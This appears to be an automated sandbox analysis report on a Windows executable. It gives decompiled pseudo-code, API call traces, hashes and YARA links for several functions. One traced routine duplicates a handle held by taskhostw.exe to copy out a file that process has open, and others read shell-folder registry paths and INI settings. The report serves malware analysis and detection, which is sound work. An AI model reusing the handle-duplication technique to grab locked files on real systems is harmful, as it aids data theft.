OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C638
GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C657
DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C664
GetFileSize.KERNEL32(?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C679

Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363

CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C697
MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00001388,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6AC
WriteFile.KERNELBASE(?,00000000,00001388,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6C7
UnmapViewOfFile.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D0
FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D9
CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6DE
CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E3
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E8

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationView$??2@??3@DuplicateMappingOpenSizeUnmapWrite_wcsicmpmemset
String ID:
API String ID: 3028965261-0
Opcode ID: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
Instruction ID: e6db179c7e43cd6fbe3270d478d1169048f03751868c197fc0ca6440827a8631
Opcode Fuzzy Hash: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
Instruction Fuzzy Hash: DD31F5B5800209FFDB11AFA5DD889AE7BB9FB08344F10443AF905B6260D7758E54DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00401ED6, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00401ED6(signed int __ecx, void* __edx, intOrPtr* _a4) {
				char _v516;
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				void _v546;
				char _v548;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				intOrPtr _v576;
				int _v580;
				short _v582;
				void _v584;
				intOrPtr _v588;
				signed int _v592;
				signed int _v596;
				wchar_t* _v600;
				signed int _v604;
				intOrPtr _v624;
				char _v632;
				void* __ebx;
				void* __edi;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t97;
				signed int _t104;
				int _t124;
				intOrPtr _t126;
				signed int _t127;
				void* _t131;
				intOrPtr* _t151;
				signed int _t153;
				void* _t156;
				void* _t157;

				_t134 = __ecx;
				_v592 = __ecx;
				_v584 = 0;
				_v582 = 0;
				_v580 = 0;
				_v588 = 0x40f634;
				_t73 = memset( &_v584, 0, 0x44);
				_t126 =  *0x41235c; // 0x0
				_t151 = _a4;
				_t74 = _t73 | 0xffffffff;
				_t156 = (_t153 & 0xfffffff8) - 0x254 + 0xc;
				_v572 = _t74;
				_v568 = _t74;
				_v564 = _t74;
				_v560 = _t74;
				_t127 = _t126 - 1;
				_v520 = 0;
				_v600 =  *((intOrPtr*)(_t151 + 0x28));
				if(_t127 < 0) {
					L3:
					_t127 = _t127 | 0xffffffff;
				} else {
					while(1) {
						_t124 = wcscmp(_v600, E00406306(0x412340, _t127));
						_pop(_t134);
						if(_t124 == 0) {
							goto L4;
						}
						_t127 = _t127 - 1;
						if(_t127 >= 0) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
				}
				L4:
				if(_t127 != 0xffffffff) {
					_t76 = _t127;
				} else {
					_t76 = E00406264(0x412340, _t134, _v600); // executed
				}
				_v556 = _t76;
				_v524 =  *((intOrPtr*)(_t151 + 0x2c));
				_v548 =  *_t151;
				_v544 =  *((intOrPtr*)(_t151 + 4));
				_v540 =  *((intOrPtr*)(_t151 + 8));
				_v536 =  *((intOrPtr*)(_t151 + 0xc));
				_v532 =  *((intOrPtr*)(_t151 + 0x10));
				_t129 = _v592 + 0x84c;
				_v528 =  *((intOrPtr*)(_t151 + 0x14));
				_v596 = _v592 + 0x84c;
				E00406434(_v592 + 0x84c,  *((intOrPtr*)(_t151 + 0x20)), 0xffffffff, 0);
				_v580 = E00406264(0x412320, _t134, E0040636E(_t129));
				E00406434(_t129,  *((intOrPtr*)(_t151 + 0x24)), 0xffffffff, 0); // executed
				_v592 = E00406264(0x412320, _t134, E0040636E(_t129));
				_t131 = _v624 + 0x860;
				 *((intOrPtr*)(_t131 + 0x1c)) = 0;
				 *((intOrPtr*)(_t131 + 4)) = 0;
				_v632 = 0;
				_v548 = 0;
				memset( &_v546, 0, 0x1fe);
				_t97 = E0040610D(_t134,  &_v632,  &_v548, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
				_t157 = _t156 + 0x20;
				while(_t97 != 0) {
					E00406264(_t131, _t134,  &_v516);
					_t97 = E0040610D(_t134,  &_v604,  &_v520, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
					_t157 = _t157 + 0x14;
				}
				E0040637A(_t97 | 0xffffffff, _v596, 0x40f454);
				_t104 = _v596;
				_v604 = _v604 & 0x00000000;
				if( *((intOrPtr*)(_t104 + 0x87c)) > 0) {
					do {
						if(_v600 != 0) {
							_t166 = _t104 | 0xffffffff;
							E004063DD(_t104 | 0xffffffff, _t134, _v596, _t104 | 0xffffffff, ".");
						}
						E004063DD(E00406306(_t131,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1) | 0xffffffff,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1, _v596, _t166, _t116);
						_v604 = _v604 + 1;
						_t104 = _v596;
						_t134 = _v604;
					} while (_v604 <  *((intOrPtr*)(_t104 + 0x87c)));
				}
				_v576 = E00406264(0x412320, _t134, E0040636E(_v596));
				_v576 = E00406264(0x412320, _t134,  *((intOrPtr*)(_t151 + 0x18)));
				return E00408603( &(_v600[0xffffffffffffff2d]),  &_v596, _t134);
			}

0x00401ed6
0x00401eef
0x00401ef3
0x00401ef8
0x00401efd
0x00401f01
0x00401f09
0x00401f0e
0x00401f14
0x00401f17
0x00401f1a
0x00401f1d
0x00401f21
0x00401f25
0x00401f29
0x00401f30
0x00401f33
0x00401f37
0x00401f3b
0x00401f5c
0x00401f5c
0x00000000
0x00401f3d
0x00401f4e
0x00401f56
0x00401f57
0x00000000
0x00000000
0x00401f59
0x00401f5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401f5a
0x00401f3d
0x00401f5f
0x00401f62
0x00401f74
0x00401f64
0x00401f6d
0x00401f6d
0x00401f7a
0x00401f81
0x00401f87
0x00401f8e
0x00401f95
0x00401f9c
0x00401fa9
0x00401fb0
0x00401fb6
0x00401fba
0x00401fbe
0x00401fdb
0x00401fdf
0x00401fff
0x00402007
0x0040200f
0x00402012
0x00402015
0x00402019
0x0040201e
0x0040203a
0x0040203f
0x00402070
0x0040204b
0x00402068
0x0040206d
0x0040206d
0x00402080
0x00402085
0x00402089
0x00402095
0x00402097
0x0040209c
0x004020a7
0x004020aa
0x004020aa
0x004020cd
0x004020d2
0x004020d6
0x004020da
0x004020de
0x00402097
0x004020ff
0x0040210a
0x00402126

APIs

memset.MSVCRT ref: 00401F09
wcscmp.MSVCRT ref: 00401F4E
memset.MSVCRT ref: 0040201E

Strings

#A, xrefs: 00401FCB
@#A, xrefs: 00401F3F
#A, xrefs: 004020F0
@#A, xrefs: 00401F68
#A, xrefs: 00401FEC

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscmp
String ID: #A$ #A$ #A$@#A$@#A
API String ID: 243296809-3329557610
Opcode ID: 551c5d0b41552bd75e6a54948491ad4efb7b493be535b428f589f19a70e77ed3
Instruction ID: dbc7ccb7a4322fbd292e3ccaf68edd9f7786ca1a27a33b966897527a52c99039
Opcode Fuzzy Hash: 551c5d0b41552bd75e6a54948491ad4efb7b493be535b428f589f19a70e77ed3
Instruction Fuzzy Hash: D2612D715083419FC310EF6AC981A1BB7E4AF88324F108A3EF5A9E72E1D779D4158B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DACC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040DACC(wchar_t* __ebx, void* __ecx) {
				void* _v8;
				char _v72;
				void _v590;
				long _v592;
				void* __esi;
				void* _t25;
				void* _t27;
				intOrPtr _t38;

				_t27 = __ecx;
				_t26 = __ebx;
				E0040DA9D();
				_t38 =  *0x413264; // 0x76033bb0
				if(_t38 == 0) {
					_v592 = 0;
					memset( &_v590, 0, 0x206);
					_t3 =  &_v8; // 0x403a63
					if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", 0, 0x20019, _t3) == 0) {
						_t5 =  &_v8; // 0x403a63
						E0040D6BF(0x104, _t27,  &_v592,  *_t5,  &_v72);
						RegCloseKey(_v8);
					}
					wcscpy(_t26,  &_v592);
					return 0 |  *_t26 != 0x00000000;
				}
				E004058FB();
				_t25 =  *0x413264(0, __ebx, 0x1c, 0); // executed
				return _t25;
			}

0x0040dacc
0x0040dacc
0x0040dad6
0x0040dadd
0x0040dae3
0x0040db04
0x0040db0b
0x0040db13
0x0040db2f
0x0040db36
0x0040db44
0x0040db4e
0x0040db54
0x0040db5d
0x00000000
0x0040db69
0x0040dae5
0x0040daef
0x00000000

APIs

Part of subcall function 0040DA9D: LoadLibraryW.KERNEL32(shell32.dll,0040BEBF,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040DAAB
Part of subcall function 0040DA9D: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040DAC0

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
memset.MSVCRT ref: 0040DB0B
RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,c:@,?,?,?), ref: 0040DB27
RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0040DB4E
wcscpy.MSVCRT ref: 0040DB5D

Part of subcall function 004058FB: GetVersionExW.KERNEL32(00412B18,?,0040DAEA,?), ref: 00405915

Strings

c:@, xrefs: 0040DB13, 0040DB36, 0040DB16
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040DB1D

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseFolderLibraryLoadOpenPathProcSpecialVersionmemsetwcscpy
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$c:@
API String ID: 2249099915-3068728944
Opcode ID: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
Instruction ID: c666c52b0d5343781dad8f8333b9175691e3d2dec84d7c30fbf64d54c1d05659
Opcode Fuzzy Hash: f480cd8af7d095bfef13feb9d9cc8ebde1203ca612b0bf388242ca1e0458cdbf
Instruction Fuzzy Hash: FE01D671905214AED720BB95AD4AEEF777CDF84304F2000BAF909B10D2EA745E88DA69

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB15, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040BB15(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t35;
				intOrPtr _t37;
				intOrPtr _t38;
				struct HICON__* _t42;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t57;
				intOrPtr* _t59;
				void* _t60;

				_t59 =  *((intOrPtr*)(_t60 + 0xc));
				 *((intOrPtr*)(_t59 + 0x208)) = 0;
				 *((intOrPtr*)(_t59 + 0x244)) = 0;
				 *((intOrPtr*)(_t59 + 0x274)) = 0;
				 *((intOrPtr*)(_t59 + 0x240)) = 0;
				 *_t59 = 0x410438;
				_t35 = _t59 + 0x6ac;
				 *((intOrPtr*)(_t59 + 0x694)) = 0;
				_t50 = _t59 + 0x6c4;
				 *((intOrPtr*)(_t35 + 0xc)) = 0;
				 *_t35 = 0;
				 *((intOrPtr*)(_t35 + 4)) = 0;
				 *((intOrPtr*)(_t35 + 0x10)) = 0x100;
				 *((intOrPtr*)(_t35 + 8)) = 0;
				E0040133A(_t50);
				 *_t50 = 0x40f7b8;
				_t37 = E0040167A(_t50 + 0x40);
				 *((short*)(_t50 + 0x80)) = 0;
				 *((intOrPtr*)(_t50 + 0x2080)) = 1;
				 *((intOrPtr*)(_t50 + 0x2084)) = 1;
				 *((intOrPtr*)(_t50 + 0x2088)) = 1;
				_push(0x2238);
				 *((intOrPtr*)(_t50 + 4)) = 0x72;
				 *((intOrPtr*)(_t50 + 0x74)) = 0;
				 *((intOrPtr*)(_t50 + 0x78)) = 0;
				L0040E038(); // executed
				if(_t37 == 0) {
					_t37 = 0;
					__eflags = 0;
				} else {
					 *((intOrPtr*)(_t37 + 0x14)) = 1;
					 *((short*)(_t37 + 0x18)) = 0;
					 *((short*)(_t37 + 0x228)) = 0;
					 *((intOrPtr*)(_t37 + 0x2228)) = 1;
					 *((intOrPtr*)(_t37 + 0x222c)) = 1;
					 *((intOrPtr*)(_t37 + 0x2230)) = 1;
					 *0x412b14 = _t37;
				}
				 *((intOrPtr*)(_t59 + 0x698)) = _t37;
				L0040E038();
				_t63 = _t37;
				_t48 = 0xc00;
				if(_t37 == 0) {
					_t38 = 0;
					__eflags = 0;
				} else {
					_t38 = E0040219B(_t37, _t63);
				}
				_t57 = _t59 + 0x27c;
				 *_t57 = 0;
				 *((intOrPtr*)(_t59 + 0x69c)) = _t38;
				E00401000(_t59 + 0x492, _t48, 0x412054);
				 *_t57 = 0;
				 *((intOrPtr*)(_t59 + 0x284)) = 0;
				 *((intOrPtr*)(_t59 + 0x280)) = 0;
				 *((intOrPtr*)(_t59 + 0x278)) = 0;
				 *((intOrPtr*)(_t59 + 0x6a0)) = 0;
				_t42 = LoadIconW(GetModuleHandleW(0), 0x65); // executed
				E00401879(_t59, _t42);
				return _t59;
			}

0x0040bb19
0x0040bb1e
0x0040bb24
0x0040bb2a
0x0040bb30
0x0040bb36
0x0040bb3d
0x0040bb43
0x0040bb4a
0x0040bb52
0x0040bb55
0x0040bb57
0x0040bb5a
0x0040bb61
0x0040bb64
0x0040bb6c
0x0040bb72
0x0040bb7a
0x0040bb81
0x0040bb87
0x0040bb8d
0x0040bb93
0x0040bb98
0x0040bb9f
0x0040bba2
0x0040bba5
0x0040bbad
0x0040bbd6
0x0040bbd6
0x0040bbaf
0x0040bbaf
0x0040bbb2
0x0040bbb6
0x0040bbbd
0x0040bbc3
0x0040bbc9
0x0040bbcf
0x0040bbcf
0x0040bbdd
0x0040bbe3
0x0040bbe8
0x0040bbea
0x0040bbeb
0x0040bbf4
0x0040bbf4
0x0040bbed
0x0040bbed
0x0040bbed
0x0040bbf6
0x0040bbfc
0x0040bc09
0x0040bc0f
0x0040bc17
0x0040bc19
0x0040bc1f
0x0040bc25
0x0040bc2b
0x0040bc3a
0x0040bc43
0x0040bc4e

APIs

Part of subcall function 0040133A: memset.MSVCRT ref: 0040134C

Part of subcall function 0040167A: memset.MSVCRT ref: 00401690

??2@YAPAXI@Z.MSVCRT ref: 0040BBA5
??2@YAPAXI@Z.MSVCRT ref: 0040BBE3
GetModuleHandleW.KERNEL32(00000000,?,00002238), ref: 0040BC31
LoadIconW.USER32(00000000,00000065), ref: 0040BC3A

Strings

T A, xrefs: 0040BC04

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@memset$HandleIconLoadModule
String ID: T A
API String ID: 2596266805-11209434
Opcode ID: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
Instruction ID: b1f1b1f427025bd6f8a5dd4ebf1048772c532f9d5de5c5214c9bf7dacc49333d
Opcode Fuzzy Hash: 28f27a63e90cc815c55cb4a811d49b2e7c75855d82e05ab2895167a3b64a2cb9
Instruction Fuzzy Hash: 1F31ACB19013559FC720DF6989886CABBE8FF08300F11867FE84CDB261D7B89654CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D56B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E0040D56B(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;
				long _t17;

				_t25 = __esi;
				E0040E340(0x20000, __ecx);
				if(_a4 == 0) {
					_t17 = GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24); // executed
					return _t17;
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040DFD6();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}

0x0040d56b
0x0040d573
0x0040d57c
0x0040d5e0
0x0040d5e7
0x0040d57e
0x0040d580
0x0040d5be
0x0040d590
0x0040d590
0x0040d598
0x0040d599
0x0040d5a4
0x0040d5a9
0x0040d5aa
0x0040d5b2
0x0040d5bb
0x0040d5bb
0x0040d5cf
0x0040d5cf

APIs

wcschr.MSVCRT ref: 0040D585
_snwprintf.MSVCRT ref: 0040D5AA
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D5C8
GetPrivateProfileStringW.KERNEL32 ref: 0040D5E0

Strings

"%s", xrefs: 0040D599

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
Instruction ID: 59b69a585cfc8d845437793ab3ce32260e68e2dddd06eaeef13322f749f2ab00
Opcode Fuzzy Hash: 45fc58c28ada156cfd054f268333e9a0d59d786c8ed30cc34748915b681648c3
Instruction Fuzzy Hash: 3101783290421ABBEF219F919C06FDA3B6AAF04318F048035BE05601A2D7798525DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE3D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27
libraryloadertimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CE3D(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x4136f4 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x4136f4 = 1;
						 *0x4136f8 = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x4136f8 == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}

0x0040ce47
0x0040ce4e
0x0040ce56
0x0040ce5e
0x0040ce6e
0x0040ce6e
0x0040ce56
0x0040ce7a
0x0040ce92
0x0040ce7c
0x0040ce8b
0x0040ce8e
0x0040ce8e

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE4E
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 0040CE68
GetProcessTimes.KERNELBASE(?,?,?,?,?,?,0040D004,?,?,?,?,?,?,?), ref: 0040CE8B

Strings

GetProcessTimes, xrefs: 0040CE58
kernel32.dll, xrefs: 0040CE49

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
Instruction ID: 9062282254ac126051856908680c029023e6c569a8a6eaee544e1b96dd2f004d
Opcode Fuzzy Hash: 7c29d18577e7c0631cc297a8390a3d95ad77c93ea76d0503e1a5782c5d7fe6cc
Instruction Fuzzy Hash: E7F03031141209FFDF218FA0ED45F963BA8AB14301F008176F92CA1AB0D77585A4DB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040768E, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040768E(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x38));
				if(_t9 != 0) {
					_push(_t9);
					L0040E032();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x48));
				if(_t10 != 0) {
					_push(_t10);
					L0040E032();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2e4));
				if(_t11 != 0) {
					_push(_t11);
					L0040E032();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2cc));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11); // executed
						L0040E032(); // executed
						 *_t18 = 0;
					}
					_push(_t18); // executed
					L0040E032(); // executed
				}
				 *((intOrPtr*)(_t19 + 0x2cc)) = 0;
				 *((intOrPtr*)(_t19 + 0x38)) = 0;
				 *((intOrPtr*)(_t19 + 0x48)) = 0;
				 *((intOrPtr*)(_t19 + 0x2e4)) = 0;
				return _t11;
			}

0x0040768e
0x0040768e
0x00407697
0x00407699
0x0040769a
0x0040769f
0x004076a0
0x004076a5
0x004076a7
0x004076a8
0x004076ad
0x004076ae
0x004076b6
0x004076b8
0x004076b9
0x004076be
0x004076bf
0x004076c7
0x004076c9
0x004076cd
0x004076cf
0x004076d0
0x004076d6
0x004076d6
0x004076d8
0x004076d9
0x004076de
0x004076e0
0x004076e6
0x004076e9
0x004076ec
0x004076f3

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040769A
??3@YAXPAX@Z.MSVCRT ref: 004076A8
??3@YAXPAX@Z.MSVCRT ref: 004076B9
??3@YAXPAX@Z.MSVCRT ref: 004076D0
??3@YAXPAX@Z.MSVCRT ref: 004076D9

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ecba441bf80caf65155bf32042a5b6e7135137503112716ea17be55409703e0f
Instruction ID: 342c1f177218003cdd1623b0f4e7fc54ae999312f226978e8e9af0a1ecb46938
Opcode Fuzzy Hash: ecba441bf80caf65155bf32042a5b6e7135137503112716ea17be55409703e0f
Instruction Fuzzy Hash: F1F03C72949A515BC724AE6ED8C485BB3E9AB043647604C3FF14AE3690CA39BC904A1C

Uniqueness

Uniqueness Score: -1.00%

Function 00401DCF, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401DCF(void* __ecx, signed int _a4, signed short* _a8) {
				signed int _t23;
				signed short* _t24;
				void* _t27;
				signed short* _t32;

				_t23 = _a4;
				_t32 = _a8;
				 *_t32 =  *_t32 & 0x00000000;
				_t27 = 0xa;
				if(_t23 > _t27) {
					L12:
					_t24 = _t32;
					L13:
					return _t24;
				}
				switch( *((intOrPtr*)(_t23 * 4 +  &M00401E73))) {
					case 0:
						__eax = __ecx + 0x38;
						goto L15;
					case 1:
						__eax = __ecx + 0x30;
						L15:
						__eax = E00401D90(__eax, __esi); // executed
						goto L12;
					case 2:
						__ecx =  *((intOrPtr*)(__ecx + 0x10));
						goto L18;
					case 3:
						__ecx =  *((intOrPtr*)(__ecx + 0x14));
						goto L18;
					case 4:
						__ecx =  *((intOrPtr*)(__ecx + 0x18));
						goto L18;
					case 5:
						__ecx =  *((intOrPtr*)(__ecx + 0x1c));
						L18:
						__eax = 0x412320;
						goto L3;
					case 6:
						__eflags =  *(__ecx + 0x40) & 0x00000001;
						goto L6;
					case 7:
						__eflags =  *(__ecx + 0x40) & 0x00002000;
						goto L6;
					case 8:
						__eflags =  *(__ecx + 0x40) & 0x00004000;
						L6:
						if(__eflags == 0) {
							_push(9);
							_pop(__ebx);
						}
						__eax = E00406827(__ebx);
						goto L13;
					case 9:
						_push( *((intOrPtr*)(__ecx + 0x2c)));
						_push( *((intOrPtr*)(__ecx + 0x28)));
						_push(L"%I64d");
						_push(0xff);
						_push(__esi);
						L0040DFD6();
						__esp = __esp + 0x14;
						goto L12;
					case 0xa:
						_t30 =  *((intOrPtr*)(__ecx + 0x20));
						L3:
						_t24 = E00406306(0x412340, _t30);
						if(_t24 == 0) {
							_t24 = 0x40f454;
						}
						goto L13;
				}
			}

0x00401dd5
0x00401dda
0x00401ddd
0x00401de3
0x00401de6
0x00401e40
0x00401e40
0x00401e42
0x00401e47
0x00401e47
0x00401de8
0x00000000
0x00401e4a
0x00000000
0x00000000
0x00401e55
0x00401e4d
0x00401e4e
0x00000000
0x00000000
0x00401e5a
0x00000000
0x00000000
0x00401e64
0x00000000
0x00000000
0x00401e69
0x00000000
0x00000000
0x00401e6e
0x00401e5d
0x00401e5d
0x00000000
0x00000000
0x00401e07
0x00000000
0x00000000
0x00401e1f
0x00000000
0x00000000
0x00401e17
0x00401e0b
0x00401e0b
0x00401e0d
0x00401e0f
0x00401e0f
0x00401e10
0x00000000
0x00000000
0x00401e27
0x00401e2a
0x00401e2d
0x00401e32
0x00401e37
0x00401e38
0x00401e3d
0x00000000
0x00000000
0x00401def
0x00401df7
0x00401df7
0x00401dfe
0x00401e00
0x00401e00
0x00000000
0x00000000

APIs

_snwprintf.MSVCRT ref: 00401E38

Strings

%I64d, xrefs: 00401E2D
#A, xrefs: 00401E5D
@#A, xrefs: 00401DF2

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
